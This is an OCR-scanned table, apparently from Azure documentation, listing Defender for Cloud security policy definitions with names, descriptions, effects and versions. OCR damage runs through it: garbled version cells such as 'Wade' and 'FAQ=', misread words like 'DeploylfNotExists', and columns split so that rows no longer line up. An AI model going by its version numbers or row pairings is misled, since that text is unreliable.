[Preview]: Configure 
Arc-enabled SQL 
Servers to automatically 
install Microsoft 
Defender for SQL“ 


[Preview]: Configure 
Arc-enabled SQL 
Servers to automatically 
install Microsoft 
Defender for SQL and 
DCR with a Log 
Analytics workspace E 


[Preview]: Configure 
Arc-enabled SQL 
Servers to automatically 
install Microsoft 
Defender for SQL and 
DCR with a user- 
defined LA workspace # 


[Preview]: Configure 
Arc-enabled SQL 
Servers with Data 
Collection Rule 
Association to 
Microsoft Defender for 
SQL DCR & 


[Preview]: Configure 
Arc-enabled SQL 
Servers with Data 
Collection Rule 
Association to 
Microsoft Defender for 
SQL user-defined DCR Z 


[Preview]: Configure 
Association to link Arc 
machines to default 
Microsoft Defender for 
Cloud Data Collection 
Rule Z 


[Preview]: Configure 
Association to link Arc 
machines to user- 
defined Microsoft 
Defender for Cloud 
Data Collection Rule Z 


[Preview]: Configure 
Association to link 
virtual machines to 


Description 


Configure Windows Arc-enabled SQL Servers to 
automatically install the Microsoft Defender for SQL agent. 
Microsoft Defender for SQL collects events from the agent 
and uses them to provide security alerts and tailored 
hardening tasks (recommendations). 


Microsoft Defender for SQL collects events from the agent 
and uses them to provide security alerts and tailored 
hardening tasks (recommendations). Create a resource 
group, a Data Collection Rule and Log Analytics workspace 
in the same region as the machine. 


Microsoft Defender for SQL collects events from the agent 
and uses them to provide security alerts and tailored 
hardening tasks (recommendations). Create a resource 
group and a Data Collection Rule in the same region as the 
user-defined Log Analytics workspace. 


Configure association between Arc-enabled SQL Servers 
and the Microsoft Defender for SQL DCR. Deleting this 
association will break the detection of security 
vulnerabilities for this Arc-enabled SQL Servers. 


Configure association between Arc-enabled SQL Servers 
and the Microsoft Defender for SQL user-defined DCR. 
Deleting this association will break the detection of security 
vulnerabilities for this Arc-enabled SQL Servers. 


Configure Arc machines to automatically create an 
association with the default data collection rule for 
Microsoft Defender for Cloud. Deleting this association will 
break the detection of security vulnerabilities for this Arc 
machine. Target Arc machines must be in a supported 
location. 


Configure Arc machines to automatically create an 
association with the user-defined data collection rule for 
Microsoft Defender for Cloud. Deleting this association will 
break the detection of security vulnerabilities for this Arc 
machine. Target Arc machines must be in a supported 
location. 


Configure machines to automatically create an association 
with the default data collection rule for Microsoft Defender 
for Cloud. Deleting this association will break the detection 


Effect(s) 


DeploylfNotExists, 
Disabled 


DeploylfNotExists, 
Disabled 


DeploylfNotExists, 
Disabled 


DeploylfNotExists, 
Disabled 


DeploylfNotExists, 
Disabled 


DeploylfNotExists, 
Disabled 


DeploylfNotExists, 
Disabled 


DeploylfNotExists, 
Disabled 


Version 


(GitHub) 


1.0.1- 
preview E 


Wade 
preview E 


1.2.0- 
preview E 


1.0.1- 
preview E 


1,1,0- 
preview E 


2.0.0- 
preview E 


2.0.0- 
preview E 


3.0.0- 
preview 2 


Name 


(Azure portal) 


default Microsoft 
Defender for Cloud 
Data Collection Rule Z 


[Preview]: Configure 
Association to link 
virtual machines to 
user-defined Microsoft 
Defender for Cloud 
Data Collection Rule Z 


[Preview]: Configure 
Azure Defender for SQL 
agent on virtual 
machine @ 


[Preview]: Configure 
ChangeTracking 
Extension for Linux Arc 
machines E 


[Preview]: Configure 
ChangeTracking 
Extension for Linux 
virtual machine scale 
sets 2 


[Preview]: Configure 
ChangeTracking 
Extension for Linux 
virtual machines E 


[Preview]: Configure 
ChangeTracking 
Extension for Windows 
Arc machines E 


[Preview]: Configure 
ChangeTracking 


Description 


of security vulnerabilities for this virtual machine. Target 
virtual machines must be in a supported location. 


Configure machines to automatically create an association 
with the user-defined data collection rule for Microsoft 
Defender for Cloud. Deleting this association will break the 
detection of security vulnerabilities for this virtual machine. 
Target virtual machines must be in a supported location. 


Configure Windows machines to automatically install the 
Azure Defender for SQL agent where the Azure Monitor 
Agent is installed. Security Center collects events from the 
agent and uses them to provide security alerts and tailored 
hardening tasks (recommendations). Creates a resource 
group and Log Analytics workspace in the same region as 
the machine. Target virtual machines must be in a 
supported location. 


Configure Linux Arc machines to automatically install the 
ChangeTracking Extension to enable File Integrity 
Monitoring(FIM) in Azure Security Center. FIM examines 
operating system files, Windows registries, application 
software, Linux system files, and more, for changes that 
might indicate an attack. The extension can be installed in 
virtual machines and locations supported by Azure Monitor 
Agent. 


Configure Linux virtual machine scale sets to automatically 
install the ChangeTracking Extension to enable File Integrity 
Monitoring(FIM) in Azure Security Center. FIM examines 
operating system files, Windows registries, application 
software, Linux system files, and more, for changes that 
might indicate an attack. The extension can be installed in 
virtual machines and locations supported by Azure Monitor 
Agent. 


Configure Linux virtual machines to automatically install the 
ChangeTracking Extension to enable File Integrity 
Monitoring(FIM) in Azure Security Center. FIM examines 
operating system files, Windows registries, application 
software, Linux system files, and more, for changes that 
might indicate an attack. The extension can be installed in 
virtual machines and locations supported by Azure Monitor 
Agent. 


Configure Windows Arc machines to automatically install 
the ChangeTracking Extension to enable File Integrity 
Monitoring(FIM) in Azure Security Center. FIM examines 
operating system files, Windows registries, application 
software, Linux system files, and more, for changes that 
might indicate an attack. The extension can be installed in 
virtual machines and locations supported by Azure Monitor 
Agent. 


Configure Windows virtual machine scale sets to 
automatically install the ChangeTracking Extension to 


Effect(s) 


DeploylfNotExists, 
Disabled 


DeploylfNotExists, 
Disabled 


DeploylfNotExists, 
Disabled 


DeploylfNotExists, 
Disabled 


DeploylfNotExists, 
Disabled 


DeploylfNotExists, 
Disabled 


DeploylfNotExists, 
Disabled 


Version 


(GitHub) 


2.0.0- 
preview E 


1.0.0- 
preview 2 


2.0.0- 
preview E 


2.0.0- 
preview E 


2.0.0- 
preview E 


2.0.0- 
preview E 


2.0.0- 
preview E 


Námesion for Windows 
MOS Gerta scale 


setst 


[Preview]: Configure 
ChangeTracking 
Extension for Windows 
virtual machines E 


[Preview]: Configure 
machines to create the 
Microsoft Defender for 
Cloud user-defined 
pipeline using Azure 
Monitor Agent £ 


[Preview]: Configure 
Microsoft Defender for 
APIs should be enabled Z 


[Preview]: Configure 
SQL Virtual Machines 
to automatically install 
Azure Monitor Agent 2 


[Preview]: Configure 
SQL Virtual Machines 
to automatically install 
Microsoft Defender for 
SQL’ 


[Preview]: Configure 
SQL Virtual Machines 
to automatically install 
Microsoft Defender for 
SQL and DCR with a 
Log Analytics 
workspace 7 


[Preview]: Configure 
SQL Virtual Machines 
to automatically install 
Microsoft Defender for 
SQL and DCR with a 
user-defined LA 
workspace “ 


[Preview]: Configure 
supported Linux Arc 
machines to 


Desei¢pilemtegrity Monitoring(FIM) in Azure Security 
Center. FIM examines operating system files, Windows 
registries, application software, Linux system files, and 
more, for changes that might indicate an attack. The 
extension can be installed in virtual machines and locations 
supported by Azure Monitor Agent. 


Configure Windows virtual machines to automatically 
install the ChangeTracking Extension to enable File Integrity 
Monitoring(FIM) in Azure Security Center. FIM examines 
operating system files, Windows registries, application 
software, Linux system files, and more, for changes that 
might indicate an attack. The extension can be installed in 
virtual machines and locations supported by Azure Monitor 
Agent. 


Configure machines to create the Microsoft Defender for 
Cloud user-defined pipeline using Azure Monitor Agent. 
Microsoft Defender for Cloud collects events from the 
agent and uses them to provide security alerts and tailored 
hardening tasks (recommendations). Use the user-provided 
Log Analytics workspace to store audit records. Creates a 
resource group and a Data Collection Rule in the same 
region as the user-provided Log Analytics workspace. 
Target virtual machines must be in a supported location. 


Microsoft Defender for APIs brings new discovery, 
protection, detection, & response coverage to monitor for 
common API based attacks & security misconfigurations. 


Automate the deployment of Azure Monitor Agent 
extension on your Windows SQL Virtual Machines. Learn 
more: https://aka.ms/AMAOverview E. 


Configure Windows SQL Virtual Machines to automatically 
install the Microsoft Defender for SQL extension. Microsoft 
Defender for SQL collects events from the agent and uses 
them to provide security alerts and tailored hardening tasks 
(recommendations). 


Microsoft Defender for SQL collects events from the agent 
and uses them to provide security alerts and tailored 
hardening tasks (recommendations). Create a resource 
group, a Data Collection Rule and Log Analytics workspace 
in the same region as the machine. 


Microsoft Defender for SQL collects events from the agent 
and uses them to provide security alerts and tailored 
hardening tasks (recommendations). Create a resource 
group and a Data Collection Rule in the same region as the 
user-defined Log Analytics workspace. 


Configure supported Linux Arc machines to automatically 
install the Azure Security agent. Security Center collects 
events from the agent and uses them to provide security 


Effect(s) 


DeploylfNotExists, 
Disabled 


DeploylfNotExists, 
Disabled 


DeploylfNotExists, 
Disabled 


DeploylfNotExists, 
Disabled 


DeploylfNotExists, 
Disabled 


DeploylfNotExists, 
Disabled 


DeploylfNotExists, 
Disabled 


DeploylfNotExists, 
Disabled 


Version 


(GitHub) 


2.0.0- 
preview E 


1.2.0- 
preview E 


10.2- 
preview E 


bb 
preview E 


1.1.0- 
preview E 


1.2.0- 
preview E 


1.2.0- 
preview E 


1.0.0- 
preview E 


Name 


(Azure portal) 


automatically install the 
Azure Security agent ¢ 


[Preview]: Configure 
supported Linux virtual 
machine scale sets to 
automatically install the 
Azure Security agent ¢ 


[Preview]: Configure 
supported Linux virtual 
machine scale sets to 
automatically install the 
Guest Attestation 
extension E 


[Preview]: Configure 
supported Linux virtual 
machines to 
automatically enable 
Secure Boot Z 


[Preview]: Configure 
supported Linux virtual 
machines to 
automatically install the 
Azure Security agent 7 


[Preview]: Configure 
supported Linux virtual 
machines to 
automatically install the 
Guest Attestation 
extension č 


[Preview]: Configure 
supported virtual 
machines to 
automatically enable 
vTPM @ 


[Preview]: Configure 
supported Windows 
Arc machines to 
automatically install the 
Azure Security agent 7 


[Preview]: Configure 
supported Windows 
machines to 
automatically install the 
Azure Security agent 7 


[Preview]: Configure 
supported Windows 


Description 


alerts and tailored hardening tasks (recommendations). 
Target Linux Arc machines must be in a supported location. 


Configure supported Linux virtual machine scale sets to 
automatically install the Azure Security agent. Security 
Center collects events from the agent and uses them to 
provide security alerts and tailored hardening tasks 
(recommendations). Target virtual machines must be in a 
supported location. 


Configure supported Linux virtual machines scale sets to 
automatically install the Guest Attestation extension to 
allow Azure Security Center to proactively attest and 
monitor the boot integrity. Boot integrity is attested via 
Remote Attestation. 


Configure supported Linux virtual machines to 
automatically enable Secure Boot to mitigate against 
malicious and unauthorized changes to the boot chain. 
Once enabled, only trusted bootloaders, kernel and kernel 
drivers will be allowed to run. 


Configure supported Linux virtual machines to 
automatically install the Azure Security agent. Security 
Center collects events from the agent and uses them to 
provide security alerts and tailored hardening tasks 
(recommendations). Target virtual machines must be in a 
supported location. 


Configure supported Linux virtual machines to 
automatically install the Guest Attestation extension to 
allow Azure Security Center to proactively attest and 
monitor the boot integrity. Boot integrity is attested via 
Remote Attestation. 


Configure supported virtual machines to automatically 
enable vTPM to facilitate Measured Boot and other OS 
security features that require a TPM. Once enabled, vIPM 
can be used to attest boot integrity. 


Configure supported Windows Arc machines to 
automatically install the Azure Security agent. Security 
Center collects events from the agent and uses them to 
provide security alerts and tailored hardening tasks 
(recommendations). Target Windows Arc machines must be 
in a supported location. 


Configure supported Windows machines to automatically 
install the Azure Security agent. Security Center collects 
events from the agent and uses them to provide security 
alerts and tailored hardening tasks (recommendations). 
Target virtual machines must be in a supported location. 


Configure supported Windows virtual machine scale sets to 
automatically install the Azure Security agent. Security 


Effect(s) 


DeploylfNotExists, 
Disabled 


DeploylfNotExists, 
Disabled 


DeploylfNotExists, 
Disabled 


DeploylfNotExists, 
Disabled 


DeploylfNotExists, 
Disabled 


DeploylfNotExists, 
Disabled 


DeploylfNotExists, 
Disabled 


DeploylfNotExists, 
Disabled 


DeploylfNotExists, 
Disabled 


Version 


(GitHub) 


2.0.0- 
preview E 


6.1.0- 
preview E 


5.0.0- 
preview 7 


7.0.0- 
preview E 


FAQ= 
preview E 


2.0.0- 
preview E 


1.0.0- 
preview E 


5.10- 
preview E 


SEA 
preview E 


Name 


(Azure portal) 


virtual machine scale 
sets to automatically 
install the Azure 
Security agent £ 


[Preview]: Configure 
supported Windows 
virtual machine scale 
sets to automatically 
install the Guest 
Attestation extension č 


[Preview]: Configure 
supported Windows 
virtual machines to 
automatically enable 
Secure Boot £ 


[Preview]: Configure 
supported Windows 
virtual machines to 
automatically install the 
Guest Attestation 
extension Z 


[Preview]: Configure the 
Microsoft Defender for 
SQL Log Analytics 
workspace 7 


[Preview]: Configure 
virtual machines to 
create the default 
Microsoft Defender for 
Cloud pipeline using 
Azure Monitor Agent Z 


[Preview]: Configure 
VMs created with 
Shared Image Gallery 
images to install the 
Guest Attestation 
extension Z 


[Preview]: Configure 
VMSS created with 
Shared Image Gallery 
images to install the 
Guest Attestation 
extension E 


[Preview]: Create and 
assign a built-in user- 


Description 


Center collects events from the agent and uses them to 
provide security alerts and tailored hardening tasks 
(recommendations). Target Windows virtual machine scale 
sets must be in a supported location. 


Configure supported Windows virtual machines scale sets 
to automatically install the Guest Attestation extension to 
allow Azure Security Center to proactively attest and 
monitor the boot integrity. Boot integrity is attested via 
Remote Attestation. 


Configure supported Windows virtual machines to 
automatically enable Secure Boot to mitigate against 
malicious and unauthorized changes to the boot chain. 
Once enabled, only trusted bootloaders, kernel and kernel 
drivers will be allowed to run. 


Configure supported Windows virtual machines to 
automatically install the Guest Attestation extension to 
allow Azure Security Center to proactively attest and 
monitor the boot integrity. Boot integrity is attested via 
Remote Attestation. 


Microsoft Defender for SQL collects events from the agent 
and uses them to provide security alerts and tailored 
hardening tasks (recommendations). Create a resource 
group and Log Analytics workspace in the same region as 
the machine. 


Configure virtual machines to create the default Microsoft 
Defender for Cloud pipeline using Azure Monitor Agent. 
Microsoft Defender for Cloud collects events from the 
agent and uses them to provide security alerts and tailored 
hardening tasks (recommendations). Create a resource 
group, a Data Collection Rule and Log Analytics workspace 
in the same region as the machine to store audit records. 
Target virtual machines must be in a supported location. 


Configure virtual machines created with Shared Image 


Gallery images to automatically install the Guest Attestation 


extension to allow Azure Security Center to proactively 
attest and monitor the boot integrity. Boot integrity is 
attested via Remote Attestation. 


Configure VMSS created with Shared Image Gallery images 
to automatically install the Guest Attestation extension to 
allow Azure Security Center to proactively attest and 
monitor the boot integrity. Boot integrity is attested via 
Remote Attestation. 


Create and assign a built-in user-assigned managed 
identity at scale to SQL virtual machines. 


Effect(s) 


DeploylfNotExists, 
Disabled 


DeploylfNotExists, 
Disabled 


DeploylfNotExists, 
Disabled 


DeploylfNotExists, 
Disabled 


DeploylfNotExists, 
Disabled 


DeploylfNotExists, 
Disabled 


DeploylfNotExists, 
Disabled 


AuditlfNotExists, 
DeploylfNotExists, 
Disabled 


Version 


(GitHub) 


4.1.0- 
preview E 


3.0.0- 
preview E 


5. 1,0 
preview E 


1.0.1- 
preview E 


5.2.0- 
preview E 


2.0.0- 
preview E 


2:1.0- 
preview E 


biat 
preview E 


Name 


(Azure portal) 


assigned managed 
identity E 


[Preview]: Deploy 
Microsoft Defender for 
Endpoint agent on 
Linux hybrid machines ¢ 


[Preview]: Deploy 
Microsoft Defender for 
Endpoint agent on 
Linux virtual machines 2 


[Preview]: Deploy 
Microsoft Defender for 
Endpoint agent on 
Windows Azure Arc 
machines E 


[Preview]: Deploy 
Microsoft Defender for 
Endpoint agent on 
Windows virtual 
machines E 


[Preview]: Guest 
Attestation extension 
should be installed on 
supported Linux virtual 
machines E 


[Preview]: Guest 
Attestation extension 
should be installed on 
supported Linux virtual 
machines scale sets E 


[Preview]: Guest 
Attestation extension 
should be installed on 
supported Windows 
virtual machines S 


[Preview]: Guest 
Attestation extension 
should be installed on 
supported Windows 
virtual machines scale 
sets’ 


[Preview]: Linux virtual 
machines should use 
only signed and trusted 
boot components E 


Description 


Deploys Microsoft Defender for Endpoint agent on Linux 
hybrid machines 


Deploys Microsoft Defender for Endpoint agent on 
applicable Linux VM images. 


Deploys Microsoft Defender for Endpoint on Windows 
Azure Arc machines. 


Deploys Microsoft Defender for Endpoint on applicable 
Windows VM images. 


Install Guest Attestation extension on supported Linux 
virtual machines to allow Azure Security Center to 
proactively attest and monitor the boot integrity. Once 
installed, boot integrity will be attested via Remote 
Attestation. This assessment applies to Trusted Launch and 
Confidential Linux virtual machines. 


Install Guest Attestation extension on supported Linux 
virtual machines scale sets to allow Azure Security Center 
to proactively attest and monitor the boot integrity. Once 
installed, boot integrity will be attested via Remote 
Attestation. This assessment applies to Trusted Launch and 
Confidential Linux virtual machine scale sets. 


Install Guest Attestation extension on supported virtual 
machines to allow Azure Security Center to proactively 
attest and monitor the boot integrity. Once installed, boot 
integrity will be attested via Remote Attestation. This 
assessment applies to Trusted Launch and Confidential 
Windows virtual machines. 


Install Guest Attestation extension on supported virtual 
machines scale sets to allow Azure Security Center to 
proactively attest and monitor the boot integrity. Once 
installed, boot integrity will be attested via Remote 
Attestation. This assessment applies to Trusted Launch and 
Confidential Windows virtual machine scale sets. 


All OS boot components (boot loader, kernel, kernel 
drivers) must be signed by trusted publishers. Defender for 
Cloud has identified untrusted OS boot components on 
one or more of your Linux machines. To protect your 
machines from potentially malicious components, add 


Effect(s) 


DeploylfNotExists, 
AuditlfNotExists, 
Disabled 


DeploylfNotExists, 
AuditlfNotExists, 
Disabled 


DeploylfNotExists, 
AuditlfNotExists, 
Disabled 


DeploylfNotExists, 
AuditlfNotExists, 
Disabled 


AuditlfNotExists, 
Disabled 


AuditlfNotExists, 
Disabled 


AuditlfNotExists, 
Disabled 


AuditlfNotExists, 
Disabled 


AuditlfNotExists, 
Disabled 


Version 


(GitHub) 


2.0.1- 
preview E 


3.0.0- 
preview E 


2.0.1 
preview E 


2.0.1- 
preview E 


6.0.0- 
preview E 


5: 1,0 
preview E 


4.0.0- 
preview E 


ERRAL 
preview E 


1.0.0- 
preview E 


Name 


(Azure portal) 


[Preview]: Linux virtual 
machines should use 
Secure Boot Z 


[Preview]: Machines 
should have ports 
closed that might 
expose attack vectors 7 


[Preview]: Microsoft 
Defender for APIs 
should be enabled zZ 


[Preview]: Secure Boot 
should be enabled on 
supported Windows 
virtual machines 7 


[Preview]: System 
updates should be 
installed on your 
machines (powered by 
Update Center) Z 


[Preview]: Virtual 
machines guest 
attestation status 
should be healthy 7 


[Preview]: vTPM should 
be enabled on 
supported virtual 
machines 7 


A maximum of 3 
owners should be 
designated for your 
subscription Z 


A vulnerability 
assessment solution 


Description 


them to your allow list or remove the identified 
components. 


To protect against the installation of malware-based 
rootkits and boot kits, enable Secure Boot on supported 
Linux virtual machines. Secure Boot ensures that only 
signed operating systems and drivers will be allowed to 
run. This assessment only applies to Linux virtual machines 
that have the Azure Monitor Agent installed. 


Azure's Terms Of Use prohibit the use of Azure services in 
ways that could damage, disable, overburden, or impair any 
Microsoft server, or the network. The exposed ports 
identified by this recommendation need to be closed for 
your continued security. For each identified port, the 
recommendation also provides an explanation of the 
potential threat. 


Microsoft Defender for APIs brings new discovery, 
protection, detection, & response coverage to monitor for 
common API based attacks & security misconfigurations. 


Enable Secure Boot on supported Windows virtual 
machines to mitigate against malicious and unauthorized 
changes to the boot chain. Once enabled, only trusted 
bootloaders, kernel and kernel drivers will be allowed to 
run. This assessment applies to Trusted Launch and 
Confidential Windows virtual machines. 


Your machines are missing system, security, and critical 
updates. Software updates often include critical patches to 
security holes. Such holes are frequently exploited in 
malware attacks so it's vital to keep your software updated. 
To install all outstanding patches and secure your 
machines, follow the remediation steps. 


Guest attestation is performed by sending a trusted log 
(TCGLog) to an attestation server. The server uses these 
logs to determine whether boot components are 
trustworthy. This assessment is intended to detect 
compromises of the boot chain which might be the result 
of a bootkit or rootkit infection. This assessment only 
applies to Trusted Launch enabled virtual machines that 
have Guest Attestation extension installed. 


Enable virtual TPM device on supported virtual machines to 
facilitate Measured Boot and other OS security features 
that require a TPM. Once enabled, vTPM can be used to 
attest boot integrity. This assessment only applies to 
trusted launch enabled virtual machines. 


It is recommended to designate up to 3 subscription 
owners in order to reduce the potential for breach by a 
compromised owner. 


Audits virtual machines to detect whether they are running 
a supported vulnerability assessment solution. A core 


Effect(s) 


AuditlfNotExists, 
Disabled 


AuditlfNotExists, 
Disabled 


AuditlfNotExists, 
Disabled 


Audit, Disabled 


AuditlfNotExists, 
Disabled 


AuditlfNotExists, 
Disabled 


Audit, Disabled 


AuditlfNotExists, 
Disabled 


AuditlfNotExists, 
Disabled 


Version 


(GitHub) 


1.0.0- 
preview E 


1.0.0- 
preview E 


1,0.2- 
preview E 


4.0.0- 
preview E 


1.0.0- 
preview E 


1.0.0- 
preview E 


2.0.0- 
preview E 


3.0.0 4 


EBALAKO 


Name 


(Azure portal) 


should be enabled on 
your virtual machines Z 


Accounts with owner 
permissions on Azure 
resources should be 
MFA enabled Z 


Accounts with read 
permissions on Azure 
resources should be 
MFA enabled Z 


Accounts with write 
permissions on Azure 
resources should be 
MFA enabled # 


Adaptive application 
controls for defining 
safe applications 
should be enabled on 
your machines E 


Adaptive network 
hardening 
recommendations 
should be applied on 
internet facing virtual 
machines E 


All network ports 
should be restricted on 
network security 
groups associated to 
your virtual machine Z 


Allowlist rules in your 
adaptive application 
control policy should 
be updated 7 


Authorized IP ranges 
should be defined on 
Kubernetes Services E 


Description 


component of every cyber risk and security program is the 
identification and analysis of vulnerabilities. Azure Security 
Center's standard pricing tier includes vulnerability 
scanning for your virtual machines at no extra cost. 
Additionally, Security Center can automatically deploy this 
tool for you. 


Multi-Factor Authentication (MFA) should be enabled for all 
subscription accounts with owner permissions to prevent a 
breach of accounts or resources. 


Multi-Factor Authentication (MFA) should be enabled for all 
subscription accounts with read privileges to prevent a 
breach of accounts or resources. 


Multi-Factor Authentication (MFA) should be enabled for all 
subscription accounts with write privileges to prevent a 
breach of accounts or resources. 


Enable application controls to define the list of known-safe 
applications running on your machines, and alert you when 
other applications run. This helps harden your machines 
against malware. To simplify the process of configuring and 
maintaining your rules, Security Center uses machine 
learning to analyze the applications running on each 
machine and suggest the list of known-safe applications. 


Azure Security Center analyzes the traffic patterns of 
Internet facing virtual machines and provides Network 
Security Group rule recommendations that reduce the 
potential attack surface 


Azure Security Center has identified some of your network 
security groups' inbound rules to be too permissive. 
Inbound rules should not allow access from AO or 
‘Internet’ ranges. This can potentially enable attackers to 
target your resources. 


Monitor for changes in behavior on groups of machines 
configured for auditing by Azure Security Center's adaptive 
application controls. Security Center uses machine learning 
to analyze the running processes on your machines and 
suggest a list of known-safe applications. These are 
presented as recommended apps to allow in adaptive 
application control policies. 


Restrict access to the Kubernetes Service Management API 
by granting API access only to IP addresses in specific 
ranges. It is recommended to limit access to authorized IP 
ranges to ensure that only applications from allowed 
networks can access the cluster. 


Effect(s) 


AuditlfNotExists, 
Disabled 


AuditlfNotExists, 
Disabled 


AuditlfNotExists, 
Disabled 


AuditlfNotExists, 
Disabled 


AuditlfNotExists, 
Disabled 


AuditlfNotExists, 
Disabled 


AuditlfNotExists, 
Disabled 


Audit, Disabled 


Version 


(GitHub) 


1.0.0 4 


1.0.07 


10.07 


30.02 


3.0.0 2 


3.0.0 4 


3.0.0 Z 


2.0.12 


Name 


(Azure portal) 


Auto provisioning of 
the Log Analytics agent 
should be enabled on 
your subscription ¢ 


Azure DDoS Protection 
Standard should be 
enabled z 


Azure Defender for App 
Service should be 
enabled Z 


Azure Defender for 
Azure SQL Database 
servers should be 
enabled Z 


Azure Defender for 
DNS should be enabled # 


Azure Defender for Key 
Vault should be 
enabled ¢ 


Azure Defender for 
open-source relational 
databases should be 
enabled Z 


Azure Defender for 
Resource Manager 
should be enabled 2 


Description 


To monitor for security vulnerabilities and threats, Azure 
Security Center collects data from your Azure virtual 
machines. Data is collected by the Log Analytics agent, 
formerly known as the Microsoft Monitoring Agent (MMA), 
which reads various security-related configurations and 
event logs from the machine and copies the data to your 
Log Analytics workspace for analysis. We recommend 
enabling auto provisioning to automatically deploy the 
agent to all supported Azure VMs and any new ones that 
are created. 


DDoS protection standard should be enabled for all virtual 
networks with a subnet that is part of an application 
gateway with a public IP. 


Azure Defender for App Service leverages the scale of the 
cloud, and the visibility that Azure has as a cloud provider, 
to monitor for common web app attacks. 


Azure Defender for SQL provides functionality for surfacing 
and mitigating potential database vulnerabilities, detecting 
anomalous activities that could indicate threats to SQL 
databases, and discovering and classifying sensitive data. 


Azure Defender for DNS provides an additional layer of 
protection for your cloud resources by continuously 
monitoring all DNS queries from your Azure resources. 
Azure Defender alerts you about suspicious activity at the 
DNS layer. Learn more about the capabilities of Azure 
Defender for DNS at https://aka.ms/defender-for-dns¢ . 
Enabling this Azure Defender plan results in charges. Learn 
about the pricing details per region on Security Center's 
pricing page: https://aka.ms/pricing-security-center@ . 


Azure Defender for Key Vault provides an additional layer 
of protection and security intelligence by detecting unusual 
and potentially harmful attempts to access or exploit key 
vault accounts. 


Azure Defender for open-source relational databases 
detects anomalous activities indicating unusual and 
potentially harmful attempts to access or exploit databases. 
Learn more about the capabilities of Azure Defender for 
open-source relational databases at 
https://aka.ms/AzDforOpenSourceDBsDocu E, Important: 
Enabling this plan will result in charges for protecting your 
open-source relational databases. Learn about the pricing 
on Security Center's pricing page: https://aka.ms/pricing- 
security-center E 


Azure Defender for Resource Manager automatically 
monitors the resource management operations in your 
organization. Azure Defender detects threats and alerts you 
about suspicious activity. Learn more about the capabilities 
of Azure Defender for Resource Manager at 
https://aka.ms/defender-for-resource-manager Z . 
Enabling this Azure Defender plan results in charges. Learn 


Effect(s) 


AuditlfNotExists, 
Disabled 


AuditlfNotExists, 
Disabled 


AuditlfNotExists, 
Disabled 


AuditlfNotExists, 
Disabled 


AuditlfNotExists, 
Disabled 


AuditlfNotExists, 
Disabled 


AuditlfNotExists, 
Disabled 


AuditlfNotExists, 
Disabled 


Version 


(GitHub) 


IDI SZ 


3.0.0 7 


1.0.3¢ 


10.2 2 


1.0.07 


1.0.32 


1.0.07 


1.0.0 “ 


Name 


(Azure portal) 


Azure Defender for 
servers should be 
enabled Z 


Azure Defender for SQL 
servers on machines 
should be enabled 7 


Azure Role-Based 
Access Control (RBAC) 
should be used on 
Kubernetes Services Z 


Blocked accounts with 
owner permissions on 
Azure resources should 
be removed # 


Blocked accounts with 
read and write 
permissions on Azure 
resources should be 
removed č 


Cloud Services 
(extended support) role 
instances should be 
configured securely Z 


Cloud Services 
(extended support) role 
instances should have 
an endpoint protection 
solution installed Z 


Cloud Services 
(extended support) role 
instances should have 
system updates 
installed 7 


Configure Azure 
Defender for App 
Service to be enabled Z 


Configure Azure 
Defender for Azure SQL 
database to be enabled 7 


Configure Azure 
Defender for DNS to be 
enabled 7 


Description 


about the pricing details per region on Security Center's 
pricing page: https://aka.ms/pricing-security-center& . 


Azure Defender for servers provides real-time threat 
protection for server workloads and generates hardening 
recommendations as well as alerts about suspicious 
activities. 


Azure Defender for SQL provides functionality for surfacing 
and mitigating potential database vulnerabilities, detecting 
anomalous activities that could indicate threats to SQL 
databases, and discovering and classifying sensitive data. 


To provide granular filtering on the actions that users can 
perform, use Azure Role-Based Access Control (RBAC) to 
manage permissions in Kubernetes Service Clusters and 
configure relevant authorization policies. 


Deprecated accounts with owner permissions should be 
removed from your subscription. Deprecated accounts are 
accounts that have been blocked from signing in. 


Deprecated accounts should be removed from your 
subscriptions. Deprecated accounts are accounts that have 
been blocked from signing in. 


Protect your Cloud Service (extended support) role 
instances from attacks by ensuring they are not expolosed 
to any OS vulnerabilities. 


Protect your Cloud Services (extended support) role 
instances from threats and vulnerabilities by ensuring an 
endpoint protection solution is installed on them. 


Secure your Cloud Services (extended support) role 
instances by ensuring the latest security and critical 
updates are installed on them. 


Azure Defender for App Service leverages the scale of the 
cloud, and the visibility that Azure has as a cloud provider, 
to monitor for common web app attacks. 


Azure Defender for SQL provides functionality for surfacing 
and mitigating potential database vulnerabilities, detecting 
anomalous activities that could indicate threats to SQL 
databases, and discovering and classifying sensitive data. 


Azure Defender for DNS provides an additional layer of 
protection for your cloud resources by continuously 
monitoring all DNS queries from your Azure resources. 


Effect(s) 


AuditlfNotExists, 
Disabled 


AuditlfNotExists, 
Disabled 


Audit, Disabled 


AuditlfNotExists, 
Disabled 


AuditlfNotExists, 
Disabled 


AuditlfNotExists, 
Disabled 


AuditlfNotExists, 
Disabled 


AuditlfNotExists, 
Disabled 


DeploylfNotExists, 


Disabled 


DeploylfNotExists, 
Disabled 


DeploylfNotExists, 
Disabled 


Version 


(GitHub) 


1.0.3 2 


102 2 


IOS 


1.0.0% 


BORRO 


10.0 7 


1.0.0 4 


1.0.07 


1.0.1¢ 


1.0.1¢ 


10.2 2 


Name 


(Azure portal) 


Configure Azure 
Defender for Key Vaults 
to be enabled £ 


Configure Azure 
Defender for open- 
source relational 
databases to be 
enabled ¢ 


Configure Azure 
Defender for Resource 


Manager to be enabled Z 


Configure Azure 
Defender for servers to 
be enabled č 


Configure Azure 
Defender for SQL 
servers on machines to 
be enabled Z 


Configure basic 
Microsoft Defender for 
Storage to be enabled 
(Activity Monitoring 
only) £ 


Configure machines to 
receive a vulnerability 
assessment provider Z 


Description Effect(s) 


Azure Defender alerts you about suspicious activity at the 
DNS layer. Learn more about the capabilities of Azure 
Defender for DNS at https://aka.ms/defender-for-dns £ . 
Enabling this Azure Defender plan results in charges. Learn 
about the pricing details per region on Security Center's 
pricing page: https://aka.ms/pricing-security-center@ . 


Azure Defender for Key Vault provides an additional layer DeploylfNotExists, 
of protection and security intelligence by detecting unusual Disabled 

and potentially harmful attempts to access or exploit key 

vault accounts. 


Azure Defender for open-source relational databases DeploylfNotExists, 
detects anomalous activities indicating unusual and Disabled 
potentially harmful attempts to access or exploit databases. 

Learn more about the capabilities of Azure Defender for 

open-source relational databases at 

https://aka.ms/AzDforOpenSourceDBsDocu £ . Important: 

Enabling this plan will result in charges for protecting your 

open-source relational databases. Learn about the pricing 

on Security Center's pricing page: https://aka.ms/pricing- 

security-center E 


Azure Defender for Resource Manager automatically DeploylfNotExists, 
monitors the resource management operations in your Disabled 
organization. Azure Defender detects threats and alerts you 

about suspicious activity. Learn more about the capabilities 

of Azure Defender for Resource Manager at 
